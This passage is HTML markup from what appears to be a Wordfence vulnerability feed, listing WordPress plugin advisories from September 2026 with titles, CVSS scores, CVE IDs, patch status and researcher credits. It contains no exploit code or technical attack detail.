<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/koreainfosec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7a20dc8052800060e8c14c1aa309a8f7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7a20dc8052800060e8c14c1aa309a8f7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/koreainfosec" target="_blank" rel="noopener">KoreaInfoSec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7edc69b-363d-49df-b82b-a9ad4fe9224a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07c16127-6840-40bc-b208-ee8c18dc514b" target="_blank" rel="noopener">Advanced Partial Payment or Deposit for WooCommerce &lt;= 3.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27378" target="_blank" rel="noopener noreferrer">							CVE-2026-27378						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-partial-payment-or-deposit-for-woocommerce" target="_blank" rel="noopener">Advanced Partial Payment or Deposit for WooCommerce</a> <span class="wfvr-software-slug">[advanced-partial-payment-or-deposit-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0412e840e77b2936441bafa1347ba51a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0412e840e77b2936441bafa1347ba51a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener">Arif Shaikh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07c16127-6840-40bc-b208-ee8c18dc514b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a5bc4cad-d227-47f8-a739-d64410f8c05e" target="_blank" rel="noopener">bbPress &lt;= 2.6.14 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62137" target="_blank" rel="noopener noreferrer">							CVE-2026-62137						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bbpress" target="_blank" rel="noopener">bbPress</a> <span class="wfvr-software-slug">[bbpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a5bc4cad-d227-47f8-a739-d64410f8c05e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a72d5e61-e3af-4ad8-bd38-5ded81741fc1" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia 9.0 &#8211; 9.8.0 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77689" target="_blank" rel="noopener noreferrer">							CVE-2026-77689						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a72d5e61-e3af-4ad8-bd38-5ded81741fc1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9356a7e8-8fc7-4969-bc41-7268241cb1e6" target="_blank" rel="noopener">Bookit — Booking &amp; Appointment Calendar &lt; 2.6.0.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88995" target="_blank" rel="noopener noreferrer">							CVE-2026-88995						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookit" target="_blank" rel="noopener">Bookit — Booking &amp; Appointment Calendar</a> <span class="wfvr-software-slug">[bookit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9356a7e8-8fc7-4969-bc41-7268241cb1e6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4e3abaf-be4d-4405-9dbe-f62f038c5a69" target="_blank" rel="noopener">Booktics – Appointment Booking Calendar for Service Businesses &lt;= 1.0.24 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62135" target="_blank" rel="noopener noreferrer">							CVE-2026-62135						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booktics" target="_blank" rel="noopener">Booktics – Appointment Booking Calendar for Service Businesses</a> <span class="wfvr-software-slug">[booktics]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b4e3abaf-be4d-4405-9dbe-f62f038c5a69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c86956bf-b013-4a84-b77e-8b1007238b27" target="_blank" rel="noopener">Booktics – Booking Calendar for Appointments and Service Businesses &lt;= 1.0.23 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11446" target="_blank" rel="noopener noreferrer">							CVE-2026-11446						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booktics" target="_blank" rel="noopener">Booktics – Appointment Booking Calendar for Service Businesses</a> <span class="wfvr-software-slug">[booktics]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revblock" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a225f8891b057a07c984d7d3796cb41f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a225f8891b057a07c984d7d3796cb41f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revblock" target="_blank" rel="noopener">revblock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c86956bf-b013-4a84-b77e-8b1007238b27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe09ddfd-a007-47f4-ae2e-a23be4bf7c13" target="_blank" rel="noopener">Csomagpontok és Címkék WooCommerce-hez &lt; 4.2.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81790" target="_blank" rel="noopener noreferrer">							CVE-2026-81790						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hungarian-pickup-points-for-woocommerce" target="_blank" rel="noopener">Csomagpontok és Címkék WooCommerce-hez</a> <span class="wfvr-software-slug">[hungarian-pickup-points-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peng-zhou" target="_blank" rel="noopener">Peng Zhou</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe09ddfd-a007-47f4-ae2e-a23be4bf7c13" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/acc22313-3a56-4571-98d6-73ea3fc5532c" target="_blank" rel="noopener">Directory Kit &lt;= 1.5.7 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18232" target="_blank" rel="noopener noreferrer">							CVE-2026-18232						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/acc22313-3a56-4571-98d6-73ea3fc5532c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b1aa13e-7efa-4dd8-afd5-28a8346bf114" target="_blank" rel="noopener">Domain For Sale – Landing Page Per Domain, Domain Mapping, Offers &amp; Listings &lt;= 3.5.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89023" target="_blank" rel="noopener noreferrer">							CVE-2026-89023						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/domain-for-sale" target="_blank" rel="noopener">Domain For Sale – Landing Page Per Domain, Domain Mapping, Offers &amp; Listings</a> <span class="wfvr-software-slug">[domain-for-sale]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/labda" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1cd29932f4aa057b73e3e1d430a928b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1cd29932f4aa057b73e3e1d430a928b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/labda" target="_blank" rel="noopener">Labda</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b1aa13e-7efa-4dd8-afd5-28a8346bf114" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe5bd645-0707-43ce-9316-d52f60035754" target="_blank" rel="noopener">DT LMS &lt;= 1.1 &#8211; Missing Authorization to Unauthenticated Arbitrary Plugin Settings Modification via Multiple AJAX Actions</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11355" target="_blank" rel="noopener noreferrer">							CVE-2026-11355						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dt-lms-lite" target="_blank" rel="noopener">DT LMS – elearning,  WordPress LMS Plugin</a> <span class="wfvr-software-slug">[dt-lms-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c451f7be2150d3f56bd9dd4de4f1998b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c451f7be2150d3f56bd9dd4de4f1998b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener">adhikara13</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe5bd645-0707-43ce-9316-d52f60035754" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bde431d-a730-422c-a301-76e09df3d930" target="_blank" rel="noopener">ElasticPress &lt;= 5.3.4 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62088" target="_blank" rel="noopener noreferrer">							CVE-2026-62088						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elasticpress" target="_blank" rel="noopener">ElasticPress</a> <span class="wfvr-software-slug">[elasticpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murlocmrglwglwgl" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d3ac8184459e40bb403a72d7723b334b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d3ac8184459e40bb403a72d7723b334b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/murlocmrglwglwgl" target="_blank" rel="noopener">murloc.mrglwglwgl</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bde431d-a730-422c-a301-76e09df3d930" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04ee71cb-500c-4685-b26d-1460dee7c759" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar &lt;= 5.6.0 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81802" target="_blank" rel="noopener noreferrer">							CVE-2026-81802						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04ee71cb-500c-4685-b26d-1460dee7c759" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e87a9ac-e7c6-4622-b3e5-6e17e7664317" target="_blank" rel="noopener">Eventin &lt;= 4.1.22 &#8211; Missing Authorization to Unauthenticated Arbitrary Order Creation and Status Manipulation via &#8216;status&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12956" target="_blank" rel="noopener noreferrer">							CVE-2026-12956						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e87a9ac-e7c6-4622-b3e5-6e17e7664317" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74df81cd-8cea-4545-86d0-eea2fdf75457" target="_blank" rel="noopener">Express Checkout &lt;= 2.4.0 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83537" target="_blank" rel="noopener noreferrer">							CVE-2026-83537						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
